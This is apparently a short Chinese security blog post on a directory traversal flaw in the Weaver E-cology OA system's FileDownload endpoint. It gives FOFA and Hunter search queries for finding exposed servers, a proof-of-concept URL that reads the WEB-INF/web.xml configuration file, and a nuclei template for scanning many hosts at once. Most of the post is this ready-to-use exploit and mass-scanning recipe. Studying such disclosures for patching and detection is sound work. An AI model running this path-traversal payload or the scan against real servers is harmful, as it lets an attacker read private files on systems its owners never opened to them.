泛微E-cology filedownload目录遍历漏洞

漏洞描述

泛微E-cology filedownload文件存在目录遍历漏洞

漏洞复现

fofa查询语法:app="泛微-协同办公OA"
鹰图查询语法:app.name="泛微 e-cology 9.0 OA"
登录页面如下:

POC:/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml

nuclei批量yaml文件

id: ecology-filedownload-directory-traversal

info:
  name: Ecology - Local File Inclusion
  author: princechaddha
  severity: high
  description: Ecology is vulnerable to local file inclusion.
  metadata:
    max-request: 1
    fofa-query: app="泛微-协同办公OA"
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: ecology,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<url-pattern>/weaver/"
        part: body
posted @ 2023-09-04 15:37  学安全的小白  阅读(819)  评论(0编辑  收藏  举报